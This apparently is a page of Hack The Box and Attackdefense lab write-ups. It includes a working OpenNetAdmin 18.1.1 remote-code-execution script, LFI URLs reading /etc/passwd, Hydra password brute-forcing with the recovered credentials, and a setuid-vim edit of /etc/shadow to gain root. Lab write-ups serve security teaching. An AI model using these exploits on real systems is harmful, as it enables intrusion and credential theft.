write-ups

hackthebox - OpenAdmin

We start by enumerating the box:

root@kali:~/htb/openadmin# nmap -sV -sT 10.10.10.171

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-21 00:20 CEST

Nmap scan report for 10.10.10.171

Host is up (0.060s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds

Not much open, SSH and HTTP.

We check the website, it's just the default html coming with Apache2.

Let's explore its directories using gobuster:

root@kali:~/htb/openadmin# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171

Gobuster v1.2                OJ Reeves (@TheColonial)

=====================================================

[+] Mode         : dir

[+] Url/Domain   : http://10.10.10.171/

[+] Threads      : 10

[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Status codes : 200,204,301,302,307

=====================================================

/music (Status: 301)

/artwork (Status: 301)

/music looks like something, if we browse there we find a SOLMUSIC application running.

A quick google search reveals an OpenNetAdmin vulnerability on SOLMUSIC. Looks like we're on the good track. But first let's check if the version of the vuln (v18.1.1) matches with the version installed in the box.

After inspecting a bit the exploit we find the admin landing page: 10.10.10171/ona/

Luckily admin / admin worked, so we're in, and we can check that the version is exactly v18.1.1. \o/

Now we look for that in searchsploit and we find this exploit:

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution

# Date: 2019-11-19

# Exploit Author: mattpascoe

# Vendor Homepage: http://opennetadmin.com/

# Software Link: https://github.com/opennetadmin/ona

# Version: v18.1.1

# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE

# Date: 2019-11-19

# Exploit Author: mattpascoe

# Vendor Homepage: http://opennetadmin.com/

# Software Link: https://github.com/opennetadmin/ona

# Version: v18.1.1

# Tested on: Linux

#!/bin/bash

URL="${1}"

while true;do

 echo -n "$ "; read cmd

 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

done

if we run:

root@kali:~/htb/openadmin# ./opennetadminexploit.sh http://10.10.10.171/ona/

$ whoami

www-data

$ cd ..

$ pwd

/opt/ona/www

$ cd ..

pwd

$ /opt/ona/www

We get a shell, but somehow restricted to some commands... at least looks like cd is not working. But still we can extract some information:

$ ls -la /home

total 16

drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .

drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..

drwxr-x---  5 jimmy  jimmy  4096 Apr 25 17:59 jimmy

drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna

So let's perform some deep enumeration with linenum:

(output ommited)

### SOFTWARE #############################################

[-] Sudo version:

Sudo version 1.8.21p2

[-] MYSQL version:

mysql  Ver 14.14 Distrib 5.7.28, for Linux (x86_64) using  EditLine wrapper

[-] Apache version:

Server version: Apache/2.4.29 (Ubuntu)

Server built:   2019-09-16T12:58:48

[-] Apache user configuration:

APACHE_RUN_USER=www-data

APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:

Loaded Modules:

 core_module (static)

 so_module (static)

 watchdog_module (static)

 http_module (static)

 log_config_module (static)

 logio_module (static)

 version_module (static)

 unixd_module (static)

 access_compat_module (shared)

 alias_module (shared)

 auth_basic_module (shared)

 authn_core_module (shared)

 authn_file_module (shared)

 authz_core_module (shared)

 authz_host_module (shared)

 authz_user_module (shared)

 autoindex_module (shared)

 deflate_module (shared)

 dir_module (shared)

 env_module (shared)

 filter_module (shared)

 mime_module (shared)

 mpm_itk_module (shared)

 mpm_prefork_module (shared)

 negotiation_module (shared)

 php7_module (shared)

 reqtimeout_module (shared)

 setenvif_module (shared)

 status_module (shared)

### INTERESTING FILES ####################################

[-] Useful file locations:

/bin/nc

/bin/netcat

/usr/bin/wget

/usr/bin/curl

[-] Can we read/write sensitive files:

-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd

-rw-r--r-- 1 root root 749 Jan  2 13:46 /etc/group

-rw-r--r-- 1 root root 581 Apr  9  2018 /etc/profile

-rw-r----- 1 root shadow 1177 Nov 22 18:01 /etc/shadow

[-] SUID files:

-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign

-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device

-rwsr-sr-x 1 root root 109432 Jul 12  2019 /usr/lib/snapd/snap-confine

-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1

-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp

-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec

-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap

-rwsr-xr-x 1 root root 149080 Oct 10  2019 /usr/bin/sudo

-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd

-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap

-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh

-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils

-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn

-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd

-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at

-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping

-rwsr-xr-x 1 root root 26696 Aug 22  2019 /bin/umount

-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su

-rwsr-xr-x 1 root root 43088 Aug 22  2019 /bin/mount

-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount

-rwsr-xr-x 1 root root 40152 May 15  2019 /snap/core/7270/bin/mount

-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7270/bin/ping

-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7270/bin/ping6

-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7270/bin/su

-rwsr-xr-x 1 root root 27608 May 15  2019 /snap/core/7270/bin/umount

-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7270/usr/bin/chfn

-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7270/usr/bin/chsh

-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7270/usr/bin/gpasswd

-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7270/usr/bin/newgrp

-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7270/usr/bin/passwd

-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7270/usr/bin/sudo

-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7270/usr/lib/openssh/ssh-keysign

-rwsr-sr-x 1 root root 102600 Jun 21  2019 /snap/core/7270/usr/lib/snapd/snap-confine

-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7270/usr/sbin/pppd

-rwsr-xr-x 1 root root 40152 Oct 10  2019 /snap/core/8039/bin/mount

-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/8039/bin/ping

-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/8039/bin/ping6

-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/8039/bin/su

-rwsr-xr-x 1 root root 27608 Oct 10  2019 /snap/core/8039/bin/umount

-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/8039/usr/bin/chfn

-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/8039/usr/bin/chsh

-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/8039/usr/bin/gpasswd

-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/8039/usr/bin/newgrp

-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/8039/usr/bin/passwd

-rwsr-xr-x 1 root root 136808 Oct 11  2019 /snap/core/8039/usr/bin/sudo

-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/8039/usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/8039/usr/lib/openssh/ssh-keysign

-rwsr-sr-x 1 root root 106696 Oct 30 12:39 /snap/core/8039/usr/lib/snapd/snap-confine

-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/8039/usr/sbin/pppd

[-] SGID files:

-rwsr-sr-x 1 root root 109432 Jul 12  2019 /usr/lib/snapd/snap-confine

-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter

-rwxr-sr-x 1 root shadow 22808 Mar 22  2019 /usr/bin/expiry

-rwxr-sr-x 1 root mlocate 43088 Mar  1  2018 /usr/bin/mlocate

-rwxr-sr-x 1 root ssh 362640 Mar  4  2019 /usr/bin/ssh-agent

-rwxr-sr-x 1 root tty 14328 Jan 17  2018 /usr/bin/bsd-write

-rwxr-sr-x 1 root tty 30800 Aug 22  2019 /usr/bin/wall

-rwxr-sr-x 1 root crontab 39352 Nov 16  2017 /usr/bin/crontab

-rwxr-sr-x 1 root shadow 71816 Mar 22  2019 /usr/bin/chage

-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at

-rwxr-sr-x 1 root shadow 34816 Feb 27  2019 /sbin/pam_extrausers_chkpwd

-rwxr-sr-x 1 root shadow 34816 Feb 27  2019 /sbin/unix_chkpwd

-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /snap/core/7270/sbin/pam_extrausers_chkpwd

-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /snap/core/7270/sbin/unix_chkpwd

-rwxr-sr-x 1 root shadow 62336 Mar 25  2019 /snap/core/7270/usr/bin/chage

-rwxr-sr-x 1 root systemd-network 36080 Apr  5  2016 /snap/core/7270/usr/bin/crontab

-rwxr-sr-x 1 root mail 14856 Dec  7  2013 /snap/core/7270/usr/bin/dotlockfile

-rwxr-sr-x 1 root shadow 22768 Mar 25  2019 /snap/core/7270/usr/bin/expiry

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/7270/usr/bin/mail-lock

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/7270/usr/bin/mail-touchlock

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/7270/usr/bin/mail-unlock

-rwxr-sr-x 1 root crontab 358624 Mar  4  2019 /snap/core/7270/usr/bin/ssh-agent

-rwxr-sr-x 1 root tty 27368 May 15  2019 /snap/core/7270/usr/bin/wall

-rwsr-sr-x 1 root root 102600 Jun 21  2019 /snap/core/7270/usr/lib/snapd/snap-confine

-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /snap/core/8039/sbin/pam_extrausers_chkpwd

-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /snap/core/8039/sbin/unix_chkpwd

-rwxr-sr-x 1 root shadow 62336 Mar 25  2019 /snap/core/8039/usr/bin/chage

-rwxr-sr-x 1 root systemd-network 36080 Apr  5  2016 /snap/core/8039/usr/bin/crontab

-rwxr-sr-x 1 root mail 14856 Dec  7  2013 /snap/core/8039/usr/bin/dotlockfile

-rwxr-sr-x 1 root shadow 22768 Mar 25  2019 /snap/core/8039/usr/bin/expiry

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/8039/usr/bin/mail-lock

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/8039/usr/bin/mail-touchlock

-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/8039/usr/bin/mail-unlock

-rwxr-sr-x 1 root crontab 358624 Mar  4  2019 /snap/core/8039/usr/bin/ssh-agent

-rwxr-sr-x 1 root tty 27368 Oct 10  2019 /snap/core/8039/usr/bin/wall

-rwsr-sr-x 1 root root 106696 Oct 30 12:39 /snap/core/8039/usr/lib/snapd/snap-confine

[+] Files with POSIX capabilities set:

/usr/bin/mtr-packet = cap_net_raw+ep

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):

-rw-r--r-- 1 root root 14867 Oct 13  2016 /etc/ltrace.conf

-rw-r--r-- 1 root root 1260 Feb 26  2018 /etc/ucf.conf

-rw-r--r-- 1 root root 5898 Aug  5  2019 /etc/ca-certificates.conf

-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf

-rw-r--r-- 1 root root 552 Apr  4  2018 /etc/pam.conf

-rw-r--r-- 1 root root 350 Aug  5  2019 /etc/popularity-contest.conf

-rw-r--r-- 1 root root 191 Feb  7  2018 /etc/libaudit.conf

-rw-r--r-- 1 root root 703 Aug 21  2017 /etc/logrotate.conf

-rw-r--r-- 1 root root 403 Mar  1  2018 /etc/updatedb.conf

-rw-r--r-- 1 root root 2584 Feb  1  2018 /etc/gai.conf

-rw-r--r-- 1 root root 100 Jun 25  2018 /etc/sos.conf

-rw-r--r-- 1 root root 2969 Feb 28  2018 /etc/debconf.conf

-rw-r--r-- 1 root root 812 Mar 24  2018 /etc/mke2fs.conf

-rw-r--r-- 1 root root 144 Nov 21 13:40 /etc/kernel-img.conf

-rw-r--r-- 1 root root 92 Apr  9  2018 /etc/host.conf

-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf

-rw-r--r-- 1 root root 1358 Jan 30  2018 /etc/rsyslog.conf

-rw-r--r-- 1 root root 604 Aug 13  2017 /etc/deluser.conf

-rw-r--r-- 1 root root 3028 Aug  5  2019 /etc/adduser.conf

-rw-r--r-- 1 root root 2683 Jan 17  2018 /etc/sysctl.conf

-rw-r--r-- 1 root root 6920 Sep 20  2018 /etc/overlayroot.conf

-rw-r--r-- 1 root root 4861 Feb 22  2018 /etc/hdparm.conf

-rw-r--r-- 1 root root 513 Aug  5  2019 /etc/nsswitch.conf

[-] Location and Permissions (if accessible) of .bak file(s):

-rw------- 1 root root 1614 Nov 21 14:12 /var/backups/passwd.bak

-rw------- 1 root shadow 599 Nov 21 19:20 /var/backups/gshadow.bak

-rw------- 1 root root 717 Nov 21 19:20 /var/backups/group.bak

-rw------- 1 root shadow 1060 Nov 21 16:44 /var/backups/shadow.bak

[-] Any interesting mail in /var/mail:

total 8

drwxrwsr-x  2 root mail 4096 Aug  5  2019 .

drwxr-xr-x 14 root root 4096 Nov 21 14:08 ..

### SCAN COMPLETE ####################################

hackthebox - ServMon

We start by enumerating the box:

nmap -sT -sV 10.10.10.184

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-14 01:06 CEST

Nmap scan report for 10.10.10.184

Host is up (0.068s latency).

Not shown: 991 closed ports

PORT     STATE SERVICE       VERSION

21/tcp   open  ftp           Microsoft ftpd

22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)

80/tcp   open  http

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open  microsoft-ds?

5666/tcp open  tcpwrapped

6699/tcp open  napster?

8443/tcp open  ssl/https-alt

Analyzing the services bottom-up we first give it a go to FTP:

root@kali:~# ftp 10.10.10.184

Connected to 10.10.10.184.

220 Microsoft FTP Service

Name (10.10.10.184:root): servmon

331 Password required

Password:

530 User cannot log in.

Login failed.

Remote system type is Windows_NT.

ftp> quit

221 Goodbye.

After checking for typical passwords, we try the anonymous account:

root@kali:~# ftp 10.10.10.184

Connected to 10.10.10.184.

220 Microsoft FTP Service

Name (10.10.10.184:root): anonymous

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

230 User logged in.

Remote system type is Windows_NT.

ftp> ls

200 PORT command successful.

125 Data connection already open; Transfer starting.

01-18-20  12:05PM       <DIR>          Users

226 Transfer complete.

ftp> cd Users

250 CWD command successful.

ftp> ls

200 PORT command successful.

125 Data connection already open; Transfer starting.

01-18-20  12:06PM       <DIR>          Nadine

01-18-20  12:08PM       <DIR>          Nathan

226 Transfer complete.

ftp> cd Nadine

250 CWD command successful.

ftp> ls

200 PORT command successful.

125 Data connection already open; Transfer starting.

01-18-20  12:08PM                  174 Confidential.txt

226 Transfer complete.

ftp> get Confidential.txt

local: Confidential.txt remote: Confidential.txt

200 PORT command successful.

125 Data connection already open; Transfer starting.

226 Transfer complete.

174 bytes received in 0.05 secs (3.2792 kB/s)

ftp> cd ..

250 CWD command successful.

ftp> cd Nathan

250 CWD command successful.

ftp> ls

200 PORT command successful.

125 Data connection already open; Transfer starting.

01-18-20  12:10PM                  186 Notes to do.txt

226 Transfer complete.

ftp> get Notes\ to\ do.txt

local: Notes to do.txt remote: Notes to do.txt

200 PORT command successful.

125 Data connection already open; Transfer starting.

226 Transfer complete.

186 bytes received in 0.05 secs (3.4413 kB/s)

ftp> exit

221 Goodbye.

We just found a couple of text files that will give us some hint for later.

root@kali:~/htb/servmon# more Confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop.  Please rem

ove this once you have edited it yourself and place it back

 into the secure folder.

Regards

Nadine

root@kali:~/htb/servmon# more Notes\ to\ do.txt

1) Change the password for NVMS - Complete

2) Lock down the NSClient Access - Complete

3) Upload the passwords

4) Remove public access to NVMS

5) Place the secret files in SharePoint

Now let's check the website, since the port 80 is open, and we see this NVMS-1000 web portal. Using searchploit (or Googling), we found there is a LFI vulnerability. We download the exploit and try to acces the Passwords.txt file that Nadine was telling Nathan.

root@kali:~/htb/servmon# python dirtrav.py http://10.10.10.184/ /Users/Nathan/Desktop/Passwords.txt Passwords.txt

Directory Traversal Succeeded

Saving Output

root@kali:~/htb/servmon# more Passwords.txt

1nsp3ctTh3Way2Mars!

Th3r34r3To0M4nyTrait0r5!

B3WithM30r4ga1n5tMe

L1k3B1gBut7s@W0rk

0nly7h3y0unGWi11F0l10w

IfH3s4b0Utg0t0H1sH0me

Gr4etN3w5w17hMySk1Pa5$

Yes! We found a file, apparently, full of passwords. Let's try them against some of the services (we create userlist file with Nathan, Nadine and ServMon). For that we will bruteforce FTP and SSH using hydra:

root@kali:~/htb/servmon# hydra -t 5 -V -f -L userlist -P Passwords.txt ftp://10.10.10.184

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:46:55

[DATA] max 5 tasks per 1 server, overall 5 tasks, 21 login tries (l:3/p:0), ~7 tries per task

[DATA] attacking ftp://10.10.10.184:21/

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 21] (0/0)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 21] (0/1)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 21] (0/2)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 21] (0/3)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 21] (0/4)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 21] (0/0)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 21] (0/1)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "1nsp3ctTh3Way2Mars!" - 8 of 0 [child 21] (0/3)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Th3r34r3To0M4nyTrait0r5!" - 9 of 0 [child 21] (0/4)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "B3WithM30r4ga1n5tMe" - 10 of 0 [child 21] (0/2)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "L1k3B1gBut7s@W0rk" - 11 of 0 [child 21] (0/0)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "0nly7h3y0unGWi11F0l10w" - 12 of 0 [child 21] (0/1)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "IfH3s4b0Utg0t0H1sH0me" - 13 of 0 [child 21] (0/3)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Gr4etN3w5w17hMySk1Pa5$" - 14 of 0 [child 21] (0/4)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "1nsp3ctTh3Way2Mars!" - 15 of 0 [child 21] (0/2)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "Th3r34r3To0M4nyTrait0r5!" - 16 of 0 [child 21] (0/0)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "B3WithM30r4ga1n5tMe" - 17 of 0 [child 21] (0/4)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "L1k3B1gBut7s@W0rk" - 18 of 0 [child 21] (0/1)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "0nly7h3y0unGWi11F0l10w" - 19 of 0 [child 21] (0/3)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "IfH3s4b0Utg0t0H1sH0me" - 20 of 0 [child 21] (0/2)

[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "Gr4etN3w5w17hMySk1Pa5$" - 21 of 0 [child 21] (0/0)

1 of 1 target completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:46:57

root@kali:~/htb/servmon# hydra -l Nathan -P Passwords.txt ssh://10.10.10.184 -V

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:57:27

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:0), ~7 try per task

[DATA] attacking ssh://10.10.10.184:22/

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 7] (0/0)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 7] (0/1)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 7] (0/2)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 7] (0/3)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 7] (0/4)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 7] (0/5)

[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 7] (0/6)

1 of 1 target completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:57:30

root@kali:~/htb/servmon# hydra -l Nadine -P Passwords.txt ssh://10.10.10.184 -V

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:57:37

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:0), ~7 try per task

[DATA] attacking ssh://10.10.10.184:22/

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 7] (0/0)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 7] (0/1)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 7] (0/2)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 7] (0/3)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 7] (0/4)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 7] (0/5)

[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 7] (0/6)

[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:57:39

Great! We found SSH credentials for Nadine.

We log in and right in the Desktop we find the flag:

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label.

 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .08/04/2020  22:28    <DIR>          ..

19/04/2020  18:41                34 user.txt               1 File(s)             34 bytes

               2 Dir(s)  27,416,674,304 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt        bd94d85aed97a7c666c3f34588d283fa

Attackdefense.com - WebAPPs CVE-2018-10517

Checking the CVE page we see the exploit. The

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Attackdefense.com - WebAPPs CVE-2018-7422

Checking the CVE page proof of concept we already identify the file with the LFI vulnerability

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Attackdefense.com - Exploiting Setuid Programs II

Initially, as g0tmi1k recommends, we should enumerate, enumerate and enumerate.

Checking distro and kernel to find any publicly known privilege escalation methods:

cat /etc/issue

uname -a

Nothing interesting was found here.

It's importance to focus on what the challenge suggests (thru his name), we should try to walk towards that path. Let's look for programs with setuid bit set:

student@attackdefense:~$ find / -perm -u=s

find: '/root': Permission denied

find: '/proc/tty/driver': Permission denied

find: '/proc/21/task/21/fd': Permission denied

find: '/proc/21/task/21/fdinfo': Permission denied

find: '/proc/21/task/21/ns': Permission denied

find: '/proc/21/fd': Permission denied

find: '/proc/21/map_files': Permission denied

find: '/proc/21/fdinfo': Permission denied

find: '/proc/21/ns': Permission denied

find: '/proc/82/task/82/fd/12': No such file or directory

find: '/proc/82/task/82/fdinfo/12': No such file or directory

find: '/proc/82/fd/11': No such file or directory

find: '/proc/82/fdinfo/11': No such file or directory

find: '/etc/ssl/private': Permission denied

/usr/bin/chfn

/usr/bin/gpasswd

/usr/bin/passwd

/usr/bin/newgrp

/usr/bin/chsh

/usr/bin/vim.tiny

/usr/bin/sudo

find: '/var/lib/apt/lists/partial': Permission denied

find: '/var/cache/apt/archives/partial': Permission denied

find: '/var/cache/ldconfig': Permission denied

/bin/mount

/bin/umount

/bin/su

From all the files, vim.tiny, shouldn't have the setuid bit set, probably a missconfiguration.

Now we should think what can we do with a text editor with root privileges.

Let's try to open a typical protected file /etc/shadow using vim.tiny. And it works. So next thing is to edit the file with a modified root password hash, crafted by ourselves:

student@attackdefense:~$ openssl passwd -1 -salt root password1

$1$root$bnjKntR6RB9fx4fklXJUc.

Finally, we only need to use, again, vim.tiny to edit /etc/shadow and write our new root password hash:

root:$1$root$bnjKntR6RB9fx4fklXJUc.:17764:0:99999:7:::

daemon:*:17764:0:99999:7:::

bin:*:17764:0:99999:7:::

sys:*:17764:0:99999:7:::

sync:*:17764:0:99999:7:::

games:*:17764:0:99999:7:::

man:*:17764:0:99999:7:::

lp:*:17764:0:99999:7:::

mail:*:17764:0:99999:7:::

news:*:17764:0:99999:7:::

uucp:*:17764:0:99999:7:::

proxy:*:17764:0:99999:7:::

www-data:*:17764:0:99999:7:::

backup:*:17764:0:99999:7:::

list:*:17764:0:99999:7:::

irc:*:17764:0:99999:7:::

gnats:*:17764:0:99999:7:::

nobody:*:17764:0:99999:7:::

_apt:*:17764:0:99999:7:::

student:!:17797::::::

We :wq! since "E45: 'readonly' option is set (add ! to override)"

And we just need to su our way into a root shell:

student@attackdefense:~$ su

Password:

using password1 and that's it. We can check it with whoami or id

Google Sites

Report abuse